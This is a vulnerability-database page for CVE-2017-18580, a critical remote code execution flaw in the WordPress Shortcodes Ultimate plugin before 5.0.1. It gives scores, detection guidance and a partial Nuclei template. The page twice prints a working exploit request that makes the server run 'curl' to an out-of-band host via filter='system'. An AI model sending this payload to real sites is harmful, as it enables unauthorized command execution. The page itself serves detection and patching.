CVE-2017-18580
published 2019-08-22CVE-2017-18580: The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
PriorityP182critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.09%
95.6th percentile
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getshortcodes | shortcodes_ultimate | < 5.0.1 | 5.0.1 |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-admin/post.php
commandaction=editpost&post_ID={{post_id}}&post_status=draft&post_type=post&_wpnonce={{nonce}}&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+{{interactsh-url}}%27+filter%3D%27system%27%5D
url/?p={{post_id}}&preview=true
- →Exploit uses the [su_meta] shortcode with a 'filter' parameter set to 'system' to achieve RCE. Detect POST requests to /wp-admin/post.php containing 'filter%3D%27system%27' or 'filter='system'' in the body.
- →The exploit targets the shortcodes-ultimate plugin before 5.0.1 for WordPress via a filter parameter in su_meta, su_post, or su_user shortcodes. Monitor for shortcode usage containing 'filter=' paired with PHP function names (e.g., system, exec, passthru) in post content. ↗
- →Successful exploitation results in an HTTP 302 redirect with 'post=' in the Location header, followed by a GET preview request. Correlate a POST to /wp-admin/post.php (302 response with 'post=' header) with a subsequent GET to /?p=<id>&preview=true and outbound DNS/HTTP callback.
- →The exploit URL-encodes the malicious shortcode payload. Look for URL-encoded bracket sequences '%5B' and '%5D' wrapping 'su_meta', 'su_post', or 'su_user' in POST body to /wp-admin/post.php.
- ·The CVE affects shortcodes-ultimate plugin versions strictly before 5.0.1. Ensure the installed plugin version is checked; version 5.0.1 and later are patched. ↗
- ·The PoC uses an out-of-band (OOB) DNS/HTTP callback via interactsh to confirm RCE. Detection relying solely on response codes may produce false positives; OOB confirmation is required for high-confidence detection.
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-83cw-ph9g-5p57: The shortcodes-ultimate plugin before 5
ghsa_unreviewed·2022-05-24
CVE-2017-18580 [CRITICAL] CWE-20 GHSA-83cw-ph9g-5p57: The shortcodes-ultimate plugin before 5
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
VulnCheck
getshortcodes shortcodes_ultimate Improper Input Validation
vulncheck·2017·CVSS 9.8
CVE-2017-18580 [CRITICAL] getshortcodes shortcodes_ultimate Improper Input Validation
getshortcodes shortcodes_ultimate Improper Input Validation
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.
Affected: getshortcodes shortcodes_ultimate
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://wpscan.com/vulnerability/efad59c8-e6ae-4167-9c78-d3ea52fe5bba/
No detection rules found.
Nuclei
WordPress Shortcodes Ultimate <= 5.0.0 - Authenticated Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-18580 [CRITICAL] WordPress Shortcodes Ultimate <= 5.0.0 - Authenticated Remote Code Execution
WordPress Shortcodes Ultimate \s*<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-f0-9]+)"'
- type: regex
name: post_id
part: body
internal: true
group: 1
regex:
- "id='post_ID' name='post_ID' value='([0-9]+)'"
- raw:
- |
POST /wp-admin/post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=editpost&post_ID={{post_id}}&post_status=draft&post_type=post&_wpnonce={{nonce}}&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+{{interactsh-url}}%27+filter%3D%27system%27%5D
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "post=")
condition: and
internal: true
- raw:
- |
GET /?p={{post_id}}&preview=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(
No writeups or analysis indexed.
2019-08-22
Published
Exploited in the wild